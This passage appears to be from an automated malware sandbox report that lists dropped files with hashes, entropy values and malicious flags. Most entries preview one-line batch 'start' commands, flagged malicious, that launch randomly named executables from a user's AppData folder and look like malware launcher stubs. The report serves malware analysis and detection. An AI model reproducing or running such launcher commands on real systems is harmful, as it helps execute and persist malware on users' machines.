                                                                                                                                                                                                                                                            SHA-512:6981B64ABA3EC413AB4E70F10985EDF2188C447047ACAF53EBC438EBC68A14FBC76ED80291E3D1CEC2A821135E838B9158D9E4E8C889030066725CE656BEAB83
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):2693
                                                                                                                                                                                                                                                            Entropy (8bit):4.002974700483056
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:8xvdOTqusHoZidAKZdA14tseh7sFiZUkmgqeh7sHfy+BX:8xYnzpnVfy
                                                                                                                                                                                                                                                            MD5:59928CD1D70E881CBB995C6DFF112FC1
                                                                                                                                                                                                                                                            SHA1:9B5F9359E224C226F731738ACD8F9BE2CD6C1D60
                                                                                                                                                                                                                                                            SHA-256:1B9F53CEC89416EADDE55F6E4C6BE9F18A46F35DF6AD8E85F985EF9B995FF8BA
                                                                                                                                                                                                                                                            SHA-512:B4AC119884C5F7BE15E1A3E78D9E98023A4FBB94030894940045A4680CC05235AB1CF7E51C81A6C176AE51DFBAED9E76776C7D4DA6523A9C8A73905C58C3C782
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Mar 11 01:31:43 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):2681
                                                                                                                                                                                                                                                            Entropy (8bit):3.9861106146128624
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:8RgdOTqu4WHoZidAKZdA1vehDiZUkwqehdfy+R:8fni6Pfy
                                                                                                                                                                                                                                                            MD5:806C6C063F08569BBA643F55AC0BEB22
                                                                                                                                                                                                                                                            SHA1:D41AC9076961CF03AFA955B89728937758221C0D
                                                                                                                                                                                                                                                            SHA-256:5E9C8B6CAE6AEC017C079DF78E7DFE2F0985986EE57966FB725E5758C35775EB
                                                                                                                                                                                                                                                            SHA-512:D4FFBF9422BFD81963E7B0A9F7C1832DA88CF54DAE37B8F032EC3559BB81226F7E8CB931F74C23E9EA798B71A6FDA91579EF5F144278BE435CC20686CF5EF3EF
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Mar 11 01:31:43 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):2681
                                                                                                                                                                                                                                                            Entropy (8bit):3.977222736777172
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:8zdOTqu4WHoZidAKZdA1hehBiZUk1W1qeh7fy+C:80ni69bfy
                                                                                                                                                                                                                                                            MD5:6AC7FAD0B4D1543DE3DD85CB7ED002EB
                                                                                                                                                                                                                                                            SHA1:FD9E81E9D37D8231382921800AE0C6CAB3182EFA
                                                                                                                                                                                                                                                            SHA-256:60DA427031504A04AD3B5D314609ED3E713CAD59675E11FECB19CFFB78146C06
                                                                                                                                                                                                                                                            SHA-512:A6D4F3604FA880EB7661C79F34D0C76F8505882283513FD6F759FCFCD6BD782A091A2E262E4A92B9EFFA8E76087329A225F3C3F158043145E42EFA960122725C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Mar 11 01:31:43 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):2683
                                                                                                                                                                                                                                                            Entropy (8bit):3.9871905493238455
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:48:8ydOTqu4WHoZidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbVfy+yT+:87niET/TbxWOvTbVfy7T
                                                                                                                                                                                                                                                            MD5:C8F3BFE51A4E5E75593C9CDC6A488385
                                                                                                                                                                                                                                                            SHA1:AC6128D9ADAFEA7A79ACE93855F1583E4D6B0529
                                                                                                                                                                                                                                                            SHA-256:72E467CC5D7F477C465606D731AB68039C61C0693A8EFD2AE5592CDDE21BD06D
                                                                                                                                                                                                                                                            SHA-512:ACFCE293F7D66AE2689466D4E0F19684B86619F609F9EA50F350B18680BD84A5FC57199330DB64CB21048E27D03C72F120BD7E871A419A012E3D42D4D5E020ED
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                                                                            Entropy (8bit):4.88794225995095
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Ljn9m1Ukh4E2J52LIjCwZAdiF:fE19232LmCwZv
                                                                                                                                                                                                                                                            MD5:A10A0D11E994C44C25769D9B494C0070
                                                                                                                                                                                                                                                            SHA1:F27D20433BAB6A4F38FC47D503D465AF82E7010C
                                                                                                                                                                                                                                                            SHA-256:D57E767DA8582E0FF5A3EBB14BCBFB8EAA6560530DE24D8FB577A13B4B767540
                                                                                                                                                                                                                                                            SHA-512:F8E88D2A9CE295357BF7E5B42ACBFE542832ABD43270F6099AEF9B1FDC599F13F64CD6AC50D788EB1265701B23E58D82661F0ADF57DC08C0A36CC8574D5066D5
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:start "" "C:\Users\user\AppData\Local\SNzmN8HQUSehVCgProaZjQEN.exe"
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                                                                            Entropy (8bit):5.029372753235096
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Ljn9m1Ukh4E2J5RdsJOy0EFn:fE19237spF
                                                                                                                                                                                                                                                            MD5:2D8804E924622EA8B5824938238D2EDE
                                                                                                                                                                                                                                                            SHA1:EFF0A3494E2E65FCFDE2074F0EFB97F14EB8A2AC
                                                                                                                                                                                                                                                            SHA-256:F9F7124498BDD59F7EBF2AB1501E9A5AA0B9264402934F9DD0E33597E904DE89
                                                                                                                                                                                                                                                            SHA-512:3626DB11529C964BC0844F96E60193E3A7C49F68F8F40AAF5CCB742328C4FC47235D40B7A512A4BC78FE442C2EC1060F5A95680F9E0188CA57FF5583EBDE1181
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:start "" "C:\Users\user\AppData\Local\4xb6JU3I8UdzuT7ogqFnBL7Y.exe"
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                                                                            Entropy (8bit):4.920663603600284
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Ljn9m1Ukh4E2J5dnwcH5LWAEFn:fE1923lNhHs
                                                                                                                                                                                                                                                            MD5:8C1D378D08D4F087E53C1D4F869197E1
                                                                                                                                                                                                                                                            SHA1:CDAC5F362DFFF804E65C48DC5C2FB826CA9005A7
                                                                                                                                                                                                                                                            SHA-256:A577769FC66D6BD2A0E163BE28CBD8E5C0198CBF4CF078692A8CB1B265F7D4B3
                                                                                                                                                                                                                                                            SHA-512:760C2ED1DE41D1F7170B9294757A935EF63D43844EB18DA46226D84EF514356E574079688F45A0C00C0EA33EFD90AB90405F8AE938AB96392C25E10966464097
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:start "" "C:\Users\user\AppData\Local\xBWhJ9fAo9Iu3r2QPWYsNC0n.exe"
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                                                                            Entropy (8bit):4.9028762822026195
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Ljn9m1Ukh4E2J5SCR/QKhUhI/VIdX3w:fE1923SCZfQI/gg
                                                                                                                                                                                                                                                            MD5:60E2BFEDE43B6A11CE8E0C4E43976232
                                                                                                                                                                                                                                                            SHA1:7A8114AE9988E4E04F05E73B76C23FF1202ABAA4
                                                                                                                                                                                                                                                            SHA-256:3FFA9EDFD3E3344FA41A37248F3770AE13BDD4AD436D4A9589E40D0B3024EF35
                                                                                                                                                                                                                                                            SHA-512:37EACF02402BC4C1A165C2031A12AD36BB59552F158D5E90A1AA43EBCDA9BEB7DFCF1B31C9F4196B30A0C9BB348E26E571E103F6C648C1E139AE1AE27D4A46CE
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:start "" "C:\Users\user\AppData\Local\wgtZ5oDAxtz8XmZjy9Pg8rRQ.exe"
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                                                                            Entropy (8bit):5.013012081410429
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Ljn9m1Ukh4E2J5wzpZ1Tgqrv:fE1923wFvg6
                                                                                                                                                                                                                                                            MD5:2F6FA4793B0C51CD1F43B0EDC9D4EA1E
                                                                                                                                                                                                                                                            SHA1:34BC6948E20B9442B998762885AD7001E363169B
                                                                                                                                                                                                                                                            SHA-256:8258365971079D7FFA1FA5A94E79A8BC64108C562EF745A6E888713C5CC05CA3
                                                                                                                                                                                                                                                            SHA-512:37AB76CAE534EFCE18DC5123E3EB4DC482917EDCDC101167B81C63FF1F8BE0CE380D43422E608D4E7C952A68089EAC0F0E0A00E1120B5D299D5C4506E36631DD
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:start "" "C:\Users\user\AppData\Local\UVLurWz0zwkQqd3HayB6HEY3.exe"
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                                                                            Entropy (8bit):4.993798110439766
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:start "" "C:\Users\user\AppData\Local\nPQO8Z9byTKoW0YecEtJrQN4.exe"
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                                                                            Entropy (8bit):4.972229896092237
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:start "" "C:\Users\user\AppData\Local\S5LR4MxNYkipKICUEWwDRrcX.exe"
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                                                                            Entropy (8bit):4.746880788794847
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:start "" "C:\Users\user\AppData\Local\Tll62OaP8oVLTcLcTrzOXqGl.exe"
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                                                                            Entropy (8bit):4.7576648959686105
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:start "" "C:\Users\user\AppData\Local\heli0xf9eUcd5qaTU2WhBrox.exe"
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                                                                            Entropy (8bit):4.857944181806523
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:start "" "C:\Users\user\AppData\Local\RLHqIpTNCBsmKjKBdfgpamFx.exe"
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                                                                            Entropy (8bit):4.953015925121575
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:start "" "C:\Users\user\AppData\Local\SNePs0JIjHDOAKzI11CQ043K.exe"
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                                                                            Entropy (8bit):4.8185886460613325
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:start "" "C:\Users\user\AppData\Local\nqutQ9rgLeAHNtyWdA1aXp1F.exe"
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                                                                            Entropy (8bit):4.883662311231956
                                                                                                                                                                                                                                                            Encrypted:false
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\BDWPWht51PAB6sI39ee6Tgbk.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):70
Entropy (8bit):5.023796188584192
Encrypted:false
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\1DHjR2vk6vS49GBZmU2Ta1ix.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):70
Entropy (8bit):4.990017217489903
Encrypted:false
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\YHw4f8SZUCkdAWRXPfF1qOas.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):70
Entropy (8bit):4.925871146123145
Encrypted:false
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\FH9ZiJrSMFU3hHrXc5ibJbFE.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):70
Entropy (8bit):4.909510474298477
Encrypted:false
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\FXJXJcvxtZRFvWakkN6k83di.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):70
Entropy (8bit):4.916513688522378
Encrypted:false
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\cUZyyg5Iay7EkA1LG3XxNCAW.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):70
Entropy (8bit):4.993798110439767
Encrypted:false
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\XbJnQ7YPZT43Q5vvoXLuAoSq.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):70
Entropy (8bit):5.029372753235095
Encrypted:false
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\pdCLEldSyO5Ik39YE4kJVbXN.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):70
Entropy (8bit):4.822369539011195
Encrypted:false
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:start "" "C:\Users\user\AppData\Local\Jye7PnMsJdWwQaaabqxbHITx.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):70
Entropy (8bit):4.9028762822026195
Encrypted:false
SSDEEP:3:Ljn9m1Ukh4E2J5SQ/WsI30sn:fE1923SQG0s
MD5:F2E312AF22BAB4474EDBDCB773B8956A
SHA1:255CC1835D06A559424544FAAB0AD36BFE69FB2F
SHA-256:64CE2E7994D531435B72EBE3ACE6C90F22DDE81007C3D93848B48600552395BA
SHA-512:8ED5778CF3DF8C5B3B06D7C92642C8ED85A6C509C5642F3AEDA0912C925550B49DEEA33C0F6852FE8B0DDE754DE28FEDD169DCCA129A3A4379DE31169E08C0BF
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\wHBfjqvEYiXClqcsZASJdtJJ.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):70
Entropy (8bit):4.788590567916905
Encrypted:false
SSDEEP:3:Ljn9m1Ukh4E2J5sYTl5TqWrmln:fE1923sYNqsml
MD5:2E4BB86D1746E8732058954E11223D75
SHA1:F2E5666DF6E8DF2435026BB5745C7565C888223E
SHA-256:C43531CCA99E69CB22904F5D6977D420494DBE0F450115B5CEE94ED74B92B8D2
SHA-512:DFED6BA897E24E0F610EF38C7DEE8C4EC8FE075B04B11AC79841AF0587C2514B45152089403865186BA52E4B5D8F9BF57B09A2B3F56BB20BEEADFAB6D7025A1C
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\IpW6W2Yjx6z6D3j66j3N2tH5.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):70
Entropy (8bit):4.973656545665237
Encrypted:false
SSDEEP:3:Ljn9m1Ukh4E2J5tSqNL3o0R4mn:fE1923VN3o0R4m
MD5:5499561ADC96671865FC532BBED6C5AD
SHA1:292E72C93922875ACBB9EA73D7D7089968C3DE7A
SHA-256:EDE966D71691998DBCA424A790CE7575AB9EECA2F273FDF7655905992DAC22F0
SHA-512:92D97855B32B20F67EF23749321DAEC37A283746B73A95C5E2E1CB3A5E11E72E7B4BB0F77120883D941DA053AE1D9518613D1D3324928D9DB8EC67E11819E065
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\H7TIhgIvG1Yhal1QnwrEdA0q.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):70
Entropy (8bit):4.862922975315049
Encrypted:false
SSDEEP:3:Ljn9m1Ukh4E2J5s2omyEF:fE1923s0yEF
MD5:55FDA4FBD732D67BA7BB988D4E4EA57F
SHA1:E6E73C703BB1897B42782549ACB7E7281E772E6E
SHA-256:332E3DF7577E14982CF5C69E57C72FC30C05F9BF8844E6F004A836E58381E7FB
SHA-512:5EFCB398F8F96CD4CD28EE915C6D4C2C84BD89C21EFA5DCEAECF7C7860C3D76635BF9CF85D37038BF89C7F9293FCEB22654F07801F2EE1D563BFB2475F7D0415
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\IiRP3mWif0xpaQsabblBwYAE.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):70
Entropy (8bit):4.830799402808093
Encrypted:false
SSDEEP:3:Ljn9m1Ukh4E2J5wJNvgLzjRLAsn:fE1923wJqHjtv
MD5:CC6B05488E0F7ADA298E067CCDEDD70A
SHA1:0B09A3E36198454F4DA3C07C77FABDA1C659C762
SHA-256:5A363E87F8911598F5DC6B5216D3CDDDA1A0176475F96A6EB142C94DCA2A67F8
SHA-512:428727D7F82A5F7ED40C7E0946197C3340D59724489D63CF3849EF0E83B12FEC2E36F731662DD7F41BFFC6C92B3AD9EFCA7900FA0353993AA203F55588F664C4
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\UbeikbXa4CwwIN3M94pDVFss.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):70
Entropy (8bit):4.693518824601853
Encrypted:false
SSDEEP:3:Ljn9m1Ukh4E2J5O3KeCX1TVL4mn:fE1923O6xlTVkm
MD5:302040BFF832D80D01E85D2451216076
SHA1:D6BEC57D2D7D5B73AC28AC72CF4E2A96C125C6B5
SHA-256:3859E86B6A0436B29ED7A970B76DCBA93B8F2E818B1DDAF12644C1E8B4574041
SHA-512:E28F1A36669F837D1B32AF5EBC42DD8D282447D04FEF32B42B00778B2BBF025BB3DDD530A730248094BB3068B146CCF3BF5BCC8C54B03C332237DF6473E4368F
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\kCfcZTexs2vlrkxr2iahpjn0.exe"

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):70
Entropy (8bit):4.942231817947811
Encrypted:false
SSDEEP:3:Ljn9m1Ukh4E2J51WD/o66KrF:fE1923D65R
MD5:B41573AE7FF078AC65B13504521CD94C
SHA1:5B0FED204A8D0890089A983AB607ADF7D578AC53
SHA-256:4BC21647BA95D987ABF86E025C12BB27A1900EF2BEDC25FD682EB8A2F9D72D0B
SHA-512:C904C9079E5C23B67D1ACA2246DB1BCEFE73268F2567D5F581F1663075B5DF339C3D3E3167D627E29951F18C43EFDE1E2C342508AF80B9F8EC27FF995AEB4011
Malicious:true
Reputation:unknown
Preview:start "" "C:\Users\user\AppData\Local\PsfJgdgdADnk5mVYPGyLWZVX.exe"
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                                                                            Entropy (8bit):4.749235032171712
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:start "" "C:\Users\user\AppData\Local\buQDl25QOPcDefNxAl6eKA66.exe"
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                                                                            Entropy (8bit):4.702278511060241
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:start "" "C:\Users\user\AppData\Local\VeFiHaAJqD2MVtOotjaLLiHl.exe"
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                                                                            Entropy (8bit):4.7937981104397664
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:start "" "C:\Users\user\AppData\Local\bAqeOotivBzC3mPFFhCilCro.exe"
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                                                                            Entropy (8bit):4.947439360470674
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:start "" "C:\Users\user\AppData\Local\vODV6f1qBtycrG7AEUewXqSZ.exe"
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                                                                            Entropy (8bit):4.7736565456652365
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:start "" "C:\Users\user\AppData\Local\xKfa5BEne98Q6CDxSSuxDfob.exe"
                                                                                                                                                                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                                                                            Entropy (8bit):4.845733425059762
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                                                                            Preview:start "" "C:\Users\user\AppData\Local\qn8N72lxWeACAPN7HO6efjE8.exe"
                                                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\wfplwfs.exe
                                                                                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (313)
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):1948
